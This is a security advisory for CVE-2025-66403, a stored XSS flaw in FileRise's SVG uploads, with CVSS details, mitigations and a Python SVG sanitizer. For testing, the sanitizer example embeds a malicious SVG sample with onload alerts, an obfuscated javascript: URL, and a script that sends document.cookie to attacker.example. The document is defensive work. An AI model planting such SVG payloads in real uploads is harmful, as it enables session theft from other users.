Overview
A stored cross-site scripting (XSS) vulnerability, identified as CVE-2025-66403, has been discovered in FileRise, a self-hosted web-based file manager. It affects versions prior to 2.2.3 and stems from the application's failure to sanitize uploaded SVG files: an attacker with upload rights can store an SVG that carries script, and that script executes in the browser of any other user who later opens the file through FileRise.
Technical Details
The vulnerability exists because FileRise accepts SVG files without validating or sanitizing embedded script content. SVG is an XML format, and an SVG document may carry inline JavaScript in <script> elements, event-handler attributes such as onload and onclick, and javascript: URLs in href attributes. When a browser renders such a file as a document, which is what happens when the user opens the file directly or the application embeds it in an <object> or <iframe> (script in an SVG loaded through an <img> tag or as a CSS background does not run), the script executes in the origin of the FileRise application. From there the attacker can act as the victim against the application's own endpoints, read data the victim can read, redirect the victim to a phishing page, or deface the interface.
The root cause is the absence of input validation for SVG uploads, in particular for <script> elements and event-handler attributes (e.g. onload, onclick) in the SVG's XML structure. Because the application treats the file as an opaque image, these elements reach the victim's browser unchanged and run as arbitrary JavaScript.
CVSS Analysis
The Common Vulnerability Scoring System (CVSS) assigns CVE-2025-66403 a score of 4.6 (Medium).
This score is based on the following factors:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): High (H)
- Privileges Required (PR): Low (L)
- User Interaction (UI): Required (R)
- Scope (S): Changed (C)
- Confidentiality Impact (C): Low (L)
- Integrity Impact (I): Low (L)
- Availability Impact (A): None (N)
Although the vector rates attack complexity as High, crafting an SVG that carries script is trivial; the practical barriers are that the attacker needs an account able to upload files and must wait for another user to open the file (PR:L, UI:R). Scope is Changed because the script runs in the victim's browser rather than in the vulnerable component, which is the usual scoring for XSS. The low privileges required and the stored nature of the payload, which fires on every later view, make this a real concern for multi-user deployments.
Possible Impact
A successful XSS attack through this vulnerability can have several impacts:
- Account Hijacking: An attacker could steal the victim's session cookie, or, if the cookie is HttpOnly, simply drive the application's own API from the victim's browser; in either case the attacker acts as the victim inside FileRise.
- Data Theft: While the confidentiality impact is rated as Low, script running in the application's origin can request and exfiltrate any file or directory listing the victim is permitted to see, so the practical impact depends on that user's permissions and the application's features.
- Application Defacement: The attacker could modify the appearance or functionality of the FileRise application for targeted users, causing disruption and potentially damaging the application’s reputation.
- Redirection to Malicious Sites: Users could be redirected to phishing websites or other malicious domains, potentially leading to further compromise.
Mitigation and Patch Steps
The recommended mitigation is to update FileRise to version 2.2.3 or later. This version includes a fix that properly sanitizes SVG files to prevent the execution of malicious scripts. To update:
- Download the latest version of FileRise from the official source.
- Follow the upgrade instructions provided in the FileRise documentation.
If updating is not immediately possible, consider the following temporary workarounds:
- Disable SVG uploads entirely within FileRise.
- Serve user uploads with a Content-Disposition: attachment header, or from a separate origin, so that a script-bearing SVG cannot execute in the FileRise origin even if it reaches a browser.
- Implement server-side validation and sanitization of uploaded SVG files using a trusted, parser-based library designed for XSS prevention (for example DOMPurify, which handles SVG). This should strip <script> elements, event-handler attributes (onload, onclick and the other on* attributes) and javascript: URLs in href attributes. Regular-expression stripping is not sufficient, since encoding and whitespace tricks evade it; parse the XML and decide per element and attribute.
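The following Python is an added example, not FileRise's code and not the fix in the linked commit. It shows the constructs described under Technical Details (a <script> element, on* handlers, a javascript: URL hidden with a character reference, and a <foreignObject>) inside a constructed SVG, and the parser-based server-side sanitization the workaround above calls for. It uses only the standard library; the names sanitize_svg, upload_is_safe, MAX_UPLOAD_BYTES and the sample documents are this example's own assumptions. It is a deny-list for illustration; a production sanitizer should allow-list elements and attributes, and should parse with defusedxml rather than xml.etree, which is not hardened against entity-expansion denial of service.

```python
"""Added example: parser-based SVG sanitization on upload (not FileRise's code).

Strips the constructs that turn an SVG into a script carrier:
  * <script> elements
  * on* event-handler attributes (onload, onclick, ...)
  * href / xlink:href values whose scheme is not http(s) or a fragment
  * <foreignObject>, which can embed arbitrary HTML
Returns the cleaned document plus a list of what was removed, so an upload
handler can reject the file instead of silently rewriting it.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Keep the default SVG namespace and the xlink prefix readable on output.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

FORBIDDEN_ELEMENTS = {"script", "foreignObject"}
URL_ATTRIBUTES = {"href", "{%s}href" % XLINK_NS}
SAFE_SCHEMES = {"http", "https"}
MAX_UPLOAD_BYTES = 1_000_000  # assumed limit for this example


def _local(name: str) -> str:
    """'{namespace}tag' -> 'tag'; plain names pass through unchanged."""
    return name.rsplit("}", 1)[-1]


def _safe_url(value: str) -> bool:
    # Browsers ignore embedded whitespace, so "java\nscript:" must be caught too.
    v = "".join(value.split()).lower()
    if v.startswith("#") or ":" not in v:
        return True  # fragment or relative reference
    return v.split(":", 1)[0] in SAFE_SCHEMES


def _scrub(elem: ET.Element, removed: list) -> None:
    """Recursively drop script-bearing attributes and elements below elem."""
    for name in list(elem.attrib):
        lname = _local(name)
        if lname.lower().startswith("on"):
            removed.append("attribute %s" % lname)
            del elem.attrib[name]
        elif name in URL_ATTRIBUTES and not _safe_url(elem.attrib[name]):
            removed.append("unsafe URL in %s: %s" % (lname, elem.attrib[name][:40]))
            del elem.attrib[name]
    for child in list(elem):
        if _local(child.tag) in FORBIDDEN_ELEMENTS:
            removed.append("element <%s>" % _local(child.tag))
            elem.remove(child)
        else:
            _scrub(child, removed)


def sanitize_svg(data: bytes) -> tuple:
    """Return (cleaned_svg_text, removed_items); raise ValueError on bad input."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise ValueError("SVG exceeds size limit")
    # xml.etree is not hardened against entity-expansion DoS; in production
    # parse with defusedxml.ElementTree.fromstring instead.
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise ValueError("not well-formed XML: %s" % exc)
    if root.tag != "{%s}svg" % SVG_NS:
        raise ValueError("root element is not <svg> in the SVG namespace")
    removed = []
    _scrub(root, removed)
    return ET.tostring(root, encoding="unicode"), removed


def upload_is_safe(data: bytes) -> bool:
    """Upload policy: accept only SVGs that needed no changes at all."""
    try:
        _, removed = sanitize_svg(data)
    except ValueError:
        return False
    return not removed


# Constructed samples for this example, not real uploads.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <rect width="10" height="10" onclick="alert(1)"/>
  <a xlink:href="java&#10;script:alert(2)"><text y="20">click</text></a>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml" onload="alert(3)"/></foreignObject>
  <circle r="5"/>
</svg>"""

BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="red"/></svg>')

if __name__ == "__main__":
    cleaned, removed = sanitize_svg(MALICIOUS_SVG)
    print("removed:", removed)
    print(cleaned)
    print("benign accepted:", upload_is_safe(BENIGN_SVG))
```

Rejecting a file that needed any change is the safer policy for a file manager: a user who uploads a scripted SVG either made a mistake or is attacking, and neither case calls for serving a rewritten file. Whatever is stored should still be served with Content-Disposition: attachment or from an origin that holds no session.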
References
- Commit fixing the vulnerability: https://github.com/error311/FileRise/commit/f2ce43f18f0444f8f63f7c33758d1837dd5ba91e
- GitHub Security Advisory: https://github.com/error311/FileRise/security/advisories/GHSA-qrcv-vjvf-fr29
